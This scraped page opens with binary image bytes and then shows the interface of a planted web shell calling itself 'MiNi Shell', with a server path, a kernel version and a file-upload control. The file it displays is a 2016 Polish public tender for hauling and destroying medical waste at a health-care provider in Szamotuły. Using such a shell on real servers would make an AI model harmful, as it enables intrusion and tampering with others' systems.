JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160513/121174-N-2016.html

<p class="kh_header"><b>Szamotuły: Wywóz i utylizacja odpadów niebezpiecznych/medycznych/ dla potrzeb SPZOZ w Szamotułach</b><br>
<b>Numer ogłoszenia: 121174 - 2016; data zamieszczenia: 13.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Sukiennicza 13, 64-500 Szamotuły, woj. wielkopolskie, tel. 061 2927103, faks 061 2927102.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz i utylizacja odpadów niebezpiecznych/medycznych/ dla potrzeb SPZOZ w Szamotułach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa odbioru i przekazania do utylizacji odpadów medycznych z Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Szamotułach (w następujących lokalizacjach: Szamotuły  ul. Sukiennicza 13, Pniewy  ul. Targowa 14, Wronki  ul. Polna 3B i Wronki ul. Partyzantów 14) w okresie 36 miesięcy. Odbiorem odpadów medycznych objęte są odpady oznaczone kodami: 18 01 01, 18 01 02*, 18 01 03*, 18 01 04,  18 01 08*, 18 01 09,  sklasyfikowane zgodnie z Rozporządzeniem Ministra Środowiska z dnia 9 grudnia 2014 r., w sprawie katalogu odpadów (Dz. U. 2014 poz. 1923).
2.  Kod CPV dla Przedmiotu Zamówienia:
90.50.00.00-2 - usługi związane z odpadami
90.52.00.00-8 - Usługi w zakresie odpadów radioaktywnych, toksycznych, medycznych i niebezpiecznych,
90.40.00.00-6 - Usługi w zakresie odpadów medycznych,
90.42.00.00-8 - Usługi usuwania odpadów szpitalnych,
90.44.00.00-0 - Usługi gromadzenia, transportu i wywozu odpadów szpitalnych.
3. Szacunkowa ilość odpadów medycznych do odbioru i unieszkodliwienia  wynosi 2.500 kg/m-c. Ilość odpadów uzależniona jest od ilości pacjentów oraz ilości wykonywanych zabiegów.
4. Wykonawca, któremu udzielone zostanie zamówienie winien udostępnić Zamawiającemu niezbędną ilość szczelnych pojemników kołowych z pokrywami - MGB lub pojemników podobnego typu niezbędnych do zbiórki i czasowego magazynowania odpadów w wyznaczonym pomieszczeniu magazynowym oraz legalizowaną wagę. 
Wymagana ilość pojemników i wag:
- 2 szt. pojemników o pojemności 240 l każdy.
- 1 szt. legalizowana waga (w przypadku zaistnienia konieczności w trakcie trwania umowy dokonania ponownej legalizacji - Wykonawca jest zobowiązany do jej wykonania na własny koszt)
5. Pojemniki muszą być sprawne technicznie, czyste, zdezynfekowane. Wykonawca dostarczy je nie później niż na 24 godziny przed rozpoczęciem realizacji umowy, po wcześniejszym pisemnym uzgodnieniu daty dostawy z Zamawiającym. Pojemniki zostaną ustawione w miejscach wskazanych przez Zamawiającego.
6. Wykonawca dokonując odbioru pojemników z odpadami, przywiezie każdorazowo taką samą ilość czystych, zdezynfekowanych pojemników na wymianę. Pojemniki stanowią własność Wykonawcy i są przekazane Zamawiającemu w użytkowanie. Użytkowanie pojemników przez okres trwania umowy ujęte jest w cenie ofertowej i nie może rodzić żadnych dodatkowych kosztów dla Zamawiającego. Wykonawca jest odpowiedzialny za bezpłatną dezynfekcję pojemników przeznaczonych na gromadzenie odpadów. Dezynfekcja powinna odbywać się po każdym odbiorze odpadów z pomieszczenia.
Wykonawca będzie zobowiązany dostarczać Zamawiającemu raz w miesiącu potwierdzenia dezynfekcji dostarczonych pojemników.
7.  Odbiór, transport i unieszkodliwienie odpadów medycznych musi odbywać się zgodnie z obowiązującymi przepisami w tym zakresie, szczególnie z ustawą z dnia 14 grudnia 2012 r., o odpadach (Dz. U. z 2013r., poz. 21 z późn. zm.). Wykonawca zobowiązany jest do dostarczenia dokumentu potwierdzającego utylizację odpadów  zgodnie z Rozporządzeniem Ministra Środowiska z dnia 13 stycznia 2014 r. w sprawie dokumentu potwierdzającego unieszkodliwienie zakaźnych odpadów medycznych (Dz. U. 2014r., poz. 107)
8. Odbiór odpadów odbywać się będzie z pomieszczenia wyznaczonego do czasowego magazynowania odpadów z częstotliwością: trzy razy w tygodniu - poniedziałek, środa, piątek i w razie potrzeby na zgłoszenie telefoniczne Zamawiającego, w godz. 8:00-13:00. W przypadku kumulacji dni wolnych Wykonawca gwarantuje odbiór odpadów medycznych, w taki sposób, aby ich okres przechowywania na terenie SPZOZ nie przekraczał 72 godzin.
9. Ważenie odpadów odbywać się będzie każdorazowo na wadze dostarczonej przez Wykonawcę, umiejscowionej w magazynie Zamawiającego w obecności pracownika Wykonawcy i pracownika Zamawiającego.
10. Każdy odbiór odpadów medycznych musi być potwierdzony kartą przekazania odpadów zgodnie z Rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014 r., w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz.U. z 2014 r., poz. 1973). Karta przekazania odpadu musi być potwierdzona każdorazowo przez przedstawicieli obu Stron. Wykonawca po potwierdzeniu, na karcie przekazania odpadu przejęcia odpadów medycznych przez spalarnię,  zwraca oryginał dokumentu Zamawiającemu. Kartę przekazania odpadów za miniony miesiąc Wykonawca zobowiązany jest dostarczać Zamawiającemu wraz z co miesięczną fakturą.
11. Transport odpadów musi odbywać się pojazdami przystosowanymi do transportu odpadów niebezpiecznych spełniających wszelkie wymagania zgodnie z ustawą z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz. U. z 2011r. Nr 227, poz. 1367 ze zm.), oraz obsługiwany przez wykwalifikowany personel.
12. Odpady medyczne muszą być unieszkodliwiane poprzez termiczne przekształcenie w spalarniach zlokalizowanych na obszarze województwa wielkopolskiego, zgodnie z obowiązującymi przepisami prawa.
Zamawiający ze względu na specyfikę przedmiotu zamówienia zastrzega, że jego wykonanie nie może być powierzone podwykonawcom.
13. Wymagania dotyczące realizacji przedmiotowej usługi:
a) ZASADA BLISKOŚCI: Zgodnie art. 20 ust 3 i art. 20 ust.6 ustawy z dnia 14 grudnia 2012 r. o odpadach zakazuje się unieszkodliwiania zakaźnych odpadów medycznych poza obszarem województwa, na którym zostały wytworzone. Dopuszcza się unieszkodliwienie zakaźnych odpadów medycznych na obszarze województwa innego niż to, na którym zostały wytworzone, w najbliżej położonej instalacji, w przypadku braku instalacji do unieszkodliwiania tych odpadów na obszarze danego województwa lub gdy istniejące instalacje nie mają wolnych mocy przerobowych.
b) METODA UNIESZKODLIWIANIA ODPADÓW: Zgodnie z art. 95 ust. 2 ustawy z dnia 14 grudnia 2012 r. o odpadach - zakaźne odpady medyczne unieszkodliwia się przez termiczne przekształcanie w spalarniach odpadów niebezpiecznych. Zakazuje się ich unieszkodliwianie we współspalarniach odpadów.
c) POTWIERDZENIE UNIESZKODLIWIENIA ODPADÓW: W oparciu o art. 95 ust. 4 i 5 ustawy z dnia 14 grudnia 2012 r. o odpadach Zamawiający wymaga, aby posiadacz odpadów tj. Wykonawca wydawał Zamawiającemu wraz z fakturą dokument potwierdzający unieszkodliwienie odpadów medycznych przez termiczne przekształcanie w spalarniach odpadów niebezpiecznych za każdy miesiąc.
d) Zamawiający wymaga, żeby odpady odbierane przez Wykonawcę były transportowane/dostarczane do zakładu utylizacji bez przepakowywania, bądź dodatkowego pakowania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.52.00.00-8, 90.40.00.00-6, 90.42.00.00-8, 90.44.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże iż posiada   
niezbędne decyzje/zezwolenia (właściwego terytorialnie organu) do wykonywania działalności w zakresie usług związanych z odbiorem, transportem i unieszkodliwianiem odpadów medycznych zgodnie z ustawą z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r, poz. 21 z późn. zm. ) lub przepisami poprzedzającymi uchwalenie w/w ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku - wymaga się złożenia oświadczenia - zał. do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże iż dysponuje co najmniej 2 środkami transportu do wykonania zamówienia, przystosowane do przewożenia towarów niebezpiecznych, stosownie do przepisów ustawy z dnia19 sierpnia 2011 r. o przewozie towarów niebezpiecznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże , że osoby kierujące pojazdami posiadają ważne zaświadczenia o  ukończeniu kursu ADR</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku - wymaga się złożenia oświadczenia - zał. do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - czas reakcji - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmiany ceny w zakresie zmian stawki podatku VAT, jeżeli zostanie ustawowo zmieniona.
2. Zmiany umowy - art. 142 ust. 5 uPzp
W przypadku wnioskowania o zmianę wynagrodzenia z tyt. zmiany wysokości minimalnego wynagrodzenia lub zasad podlegania ubezpieczeniom zdrowotnym, wykonawca musi udowodnić we wniosku o zmianę wynagrodzenia, że zmiana ta ma wymierny policzalny wpływ na wysokość wynagrodzenia.
Jeżeli wniosek o zmianę wynagrodzenia wpłynie:
a) do 30 dni, licząc od dnia wejścia w życie przepisów dokonujących tych zmian, waloryzacja wynagrodzenia nastąpi od dnia wejścia tych przepisów,
b) po terminie określonym pod lit. a - od dnia wpłynięcia wniosku.
Waloryzacja wynagrodzenia zostanie dokonana, jeżeli Zamawiający uzna ten wniosek za zasadny w wyniku negocjacji. Negocjacje mogą być przeprowadzone w formie pisemnej lub ustnej. Zmiana powinna być adekwatna, wynikająca z zaistniałej zmiany przepisów prawa. Kwota, o jaką może być zmienione wynagrodzenie, nie powinna być ani niższa, ani wyższa niż to wynika ze zmiany przepisów prawa. Zmiany zostaną wprowadzone w formie pisemnego aneksu do umowy.
Zastosowanie znajdują przepisy art. 142 ust. 5 uPzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szamotuly.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Sukiennicza 13
64-500 Szamotuły.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 12:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Sukiennicza 13
64-500 Szamotuły
sekretariat Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com